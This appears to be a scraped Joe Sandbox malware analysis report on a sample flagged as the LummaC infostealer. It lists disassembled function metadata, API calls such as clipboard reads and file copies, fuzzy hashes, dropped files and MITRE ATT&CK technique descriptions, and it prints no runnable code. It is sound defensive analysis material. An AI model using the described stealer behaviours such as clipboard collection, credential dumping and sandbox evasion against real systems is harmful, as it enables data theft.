Associated: 00000002.00000002.1880828747.0000000000975000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1880851201.0000000000987000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_930000_aspnet_regiis.jbxd

Similarity

API ID: CurrentProcess$ExitFolderForegroundPathSpecialThreadWindow
String ID:
API String ID: 4063528623-0
Opcode ID: 1b48d64e817c60132a3f7f29a1a63187a0c918cb70bc4ea82be57d5cba15beb2
Instruction ID: 40a4bab26c26d37f49db6a0120448c5828ea850ed8327f471a91f4343192981a
Opcode Fuzzy Hash: 1b48d64e817c60132a3f7f29a1a63187a0c918cb70bc4ea82be57d5cba15beb2
Instruction Fuzzy Hash: 52512333B5471447C708EEBECC8139AB6D79BC8610F0E853CA888DB395EAB49C0986C1

Function 00954470 Relevance: 5.8, APIs: 2, Strings: 1, Instructions: 571
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

\], xrefs: 009544B9

Memory Dump Source

Source File: 00000002.00000002.1880765848.0000000000931000.00000020.00000400.00020000.00000000.sdmp, Offset: 00930000, based on PE: true

Associated: 00000002.00000002.1880741665.0000000000930000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1880804917.0000000000972000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1880828747.0000000000975000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1880851201.0000000000987000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_930000_aspnet_regiis.jbxd

Similarity

API ID:
String ID: \]
API String ID: 0-1108159982
Opcode ID: 7758ee46e8cdaaf7a89c640ac9aaf0fa17c41cdcfc7e7aaa5157a0d6d4d84103
Instruction ID: f511b1d9c647407144841f02ccdf7fa71dd9c5c5f2908701944ce537213f63d0
Opcode Fuzzy Hash: 7758ee46e8cdaaf7a89c640ac9aaf0fa17c41cdcfc7e7aaa5157a0d6d4d84103
Instruction Fuzzy Hash: 7402EFB66083418BD314CF69D89176BBBE5EFC5318F04892CE9D98B251E778C949CB82

Function 0096D880 Relevance: 1.6, APIs: 1, Instructions: 55
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlReAllocateHeap.NTDLL(?,00000000,?,?), ref: 0096D8EE

Memory Dump Source

Source File: 00000002.00000002.1880765848.0000000000931000.00000020.00000400.00020000.00000000.sdmp, Offset: 00930000, based on PE: true

Associated: 00000002.00000002.1880741665.0000000000930000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1880804917.0000000000972000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1880828747.0000000000975000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1880851201.0000000000987000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_930000_aspnet_regiis.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 264a2b946c741224b3ec851d17216a5a1b4c15474d0f17bf632f55f0e8be6dfb
Instruction ID: abb48cab0f54707cfe323d70cca8af99c2f652bb5acab46abe374651b93ecf43
Opcode Fuzzy Hash: 264a2b946c741224b3ec851d17216a5a1b4c15474d0f17bf632f55f0e8be6dfb
Instruction Fuzzy Hash: 4A014CB2F1B201CBD314AF75EC55B2BBB66EFC6300F08893CE88093241E635C8558392

Function 0096D920 Relevance: 1.5, APIs: 1, Instructions: 14libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL(00941AA3), ref: 0096D94E

Memory Dump Source

Source File: 00000002.00000002.1880765848.0000000000931000.00000020.00000400.00020000.00000000.sdmp, Offset: 00930000, based on PE: true

Associated: 00000002.00000002.1880741665.0000000000930000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1880804917.0000000000972000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1880828747.0000000000975000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1880851201.0000000000987000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_930000_aspnet_regiis.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82

Function 0096B070 Relevance: 1.6, APIs: 1, Instructions: 52memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(?,00000000,?), ref: 0096B0F0

Memory Dump Source

Source File: 00000002.00000002.1880765848.0000000000931000.00000020.00000400.00020000.00000000.sdmp, Offset: 00930000, based on PE: true

Associated: 00000002.00000002.1880741665.0000000000930000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1880804917.0000000000972000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1880828747.0000000000975000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1880851201.0000000000987000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_930000_aspnet_regiis.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 8c075cb0b875ae913142121fe7c468857f3fc7aa40737c2c7afd35b68d7e581c
Instruction ID: b0496bd7789ee73a0d6a9e1dc3f9bfe53ddf4da4d0fb2bbbca3e6211328e46d1
Opcode Fuzzy Hash: 8c075cb0b875ae913142121fe7c468857f3fc7aa40737c2c7afd35b68d7e581c
Instruction Fuzzy Hash: F2017872B283518FC7089B64ECA5B2B7FA5EFC1305F0A803DDA81876A0E7B05814D7D2

Function 0096B030 Relevance: 1.5, APIs: 1, Instructions: 22memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(?,00000000,?), ref: 0096B060

Memory Dump Source

Source File: 00000002.00000002.1880765848.0000000000931000.00000020.00000400.00020000.00000000.sdmp, Offset: 00930000, based on PE: true

Associated: 00000002.00000002.1880741665.0000000000930000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1880804917.0000000000972000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1880828747.0000000000975000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1880851201.0000000000987000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_930000_aspnet_regiis.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: e303749e0a01cf48d7d74b39f086389fd45ee773988932107eebee98a530c35c
Instruction ID: fef6fd1876446743f7d7bc671757800b52f19a135832f331aa1e7c3c835d36cb
Opcode Fuzzy Hash: e303749e0a01cf48d7d74b39f086389fd45ee773988932107eebee98a530c35c
Instruction Fuzzy Hash: 61E04F3420C7408BD7495B2898A1A6BBFA6EB9A720F20166CE0D2936F1C7229856DA05

Function 0093D293 Relevance: 1.5, APIs: 1, Instructions: 17COMMON

Download Yara Rule

APIs

CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0093D2A5

Memory Dump Source

Source File: 00000002.00000002.1880765848.0000000000931000.00000020.00000400.00020000.00000000.sdmp, Offset: 00930000, based on PE: true

Associated: 00000002.00000002.1880741665.0000000000930000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1880804917.0000000000972000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1880828747.0000000000975000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1880851201.0000000000987000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_930000_aspnet_regiis.jbxd

Similarity

API ID: InitializeSecurity
String ID:
API String ID: 640775948-0
Opcode ID: 643a3811d52c4098da28cf2be096e4b469d380bb2c61cc5630dd1d15197f7802
Instruction ID: 490d6100a6b447e1019e7114f18484ec5f610699f626d873ce6c4b2024f9daad
Opcode Fuzzy Hash: 643a3811d52c4098da28cf2be096e4b469d380bb2c61cc5630dd1d15197f7802
Instruction Fuzzy Hash: A0D0C9323E87417AF134870CAC53F1436546305F51F300204B326FE2D0CAE07145E61D

Function 0093D260 Relevance: 1.5, APIs: 1, Instructions: 17COMMON

Download Yara Rule

APIs

CoInitializeEx.COMBASE(00000000,00000002), ref: 0093D273

Memory Dump Source

Source File: 00000002.00000002.1880765848.0000000000931000.00000020.00000400.00020000.00000000.sdmp, Offset: 00930000, based on PE: true

Associated: 00000002.00000002.1880741665.0000000000930000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1880804917.0000000000972000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1880828747.0000000000975000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1880851201.0000000000987000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_930000_aspnet_regiis.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: 130e5f12d1f3d41d7f92f1a10a099523a06672f1e144c3fb2377b58613a489fa
Instruction ID: 00c154d5230cf9354320155fc7d952c8ee0eedffda46f28ecacc91a033b45ec5
Opcode Fuzzy Hash: 130e5f12d1f3d41d7f92f1a10a099523a06672f1e144c3fb2377b58613a489fa
Instruction Fuzzy Hash: 66D0A7321B85047BE210A72CEC07F26376DC302724F448225B2ABC72D3ED116918E575

Non-executed Functions

Function 00963550 Relevance: 9.1, APIs: 6, Instructions: 138clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 00963572
GetWindowLongW.USER32 ref: 0096359D
GetClipboardData.USER32 ref: 009635AD
CloseClipboard.USER32 ref: 009636F4

Memory Dump Source

Source File: 00000002.00000002.1880765848.0000000000931000.00000020.00000400.00020000.00000000.sdmp, Offset: 00930000, based on PE: true

Associated: 00000002.00000002.1880741665.0000000000930000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1880804917.0000000000972000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1880828747.0000000000975000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1880851201.0000000000987000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_930000_aspnet_regiis.jbxd

Similarity

API ID: Clipboard$CloseDataLongOpenWindow
String ID:
API String ID: 1647500905-0
Opcode ID: fd2f44aaf66df0e3c4a98925690e12a005ee3b5bb46eb546261ac8eff9b993c2
Instruction ID: 1edc6578deab7e37c500b576b7c5fd075aadfcaf77955f2381646117d8667b85
Opcode Fuzzy Hash: fd2f44aaf66df0e3c4a98925690e12a005ee3b5bb46eb546261ac8eff9b993c2
Instruction Fuzzy Hash: 2151E5B1808781DFD710AB78D44A39EBFF0AB11314F04CA2DE49587782E3799658D793

Function 00957F9D Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60fileCOMMON

Download Yara Rule

APIs

CopyFileW.KERNEL32(?,B9F4BBC1,00000000), ref: 0095805E

Strings

*, xrefs: 00957FB8
*, xrefs: 00957FA7

Memory Dump Source

Source File: 00000002.00000002.1880765848.0000000000931000.00000020.00000400.00020000.00000000.sdmp, Offset: 00930000, based on PE: true

Associated: 00000002.00000002.1880741665.0000000000930000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1880804917.0000000000972000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1880828747.0000000000975000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1880851201.0000000000987000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_930000_aspnet_regiis.jbxd

Similarity

API ID: CopyFile
String ID: *$*
API String ID: 1304948518-3771216468
Opcode ID: 5e6aa5f18e0d50e4610a007e0b55b0a816771fc5822c6b1d0a4857366202f775
Instruction ID: ad9f7d87fa926f2c5737c66d84aad9cf77d723e1c889da05dd62e80cddfc477b
Opcode Fuzzy Hash: 5e6aa5f18e0d50e4610a007e0b55b0a816771fc5822c6b1d0a4857366202f775
Instruction Fuzzy Hash: D111E1B512C3449FE300EF20A85571FBBE8BB99304F544A2CF5C99A280E7B4C2498B17

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report S#U043eftWare.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: LummaC

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_S#U043eftWare.ex_c2eb22ee7582ddf93e8b655d587659adbaca8199_849bd03d_511f84fa-aed9-4bd6-a9fe-1d9ee9ac4087\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WER87AC.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WER88B7.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WER88D7.tmp.xml

C:\Users\user\AppData\Roaming\gdi32.dll

C:\Windows\appcompat\Programs\Amcache.hve

\Device\ConDrv

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Windows Analysis Report
S#U043eftWare.exe

Function 6CDD14E8 Relevance: 10.6, APIs: 7, Instructions: 136
COMMONLIBRARYCODE

Function 6CDD1598 Relevance: 7.6, APIs: 5, Instructions: 87
COMMONLIBRARYCODE

Function 6CDD6A72 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66
COMMON

Function 6CDD13E1 Relevance: 3.1, APIs: 2, Instructions: 76
COMMON

Function 6CDD620F Relevance: 3.1, APIs: 2, Instructions: 67
COMMON

Function 6CDD47D6 Relevance: 1.5, APIs: 1, Instructions: 39
memoryCOMMONLIBRARYCODE

Function 0054AC10 Relevance: 15.5, Strings: 12, Instructions: 484
COMMON

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre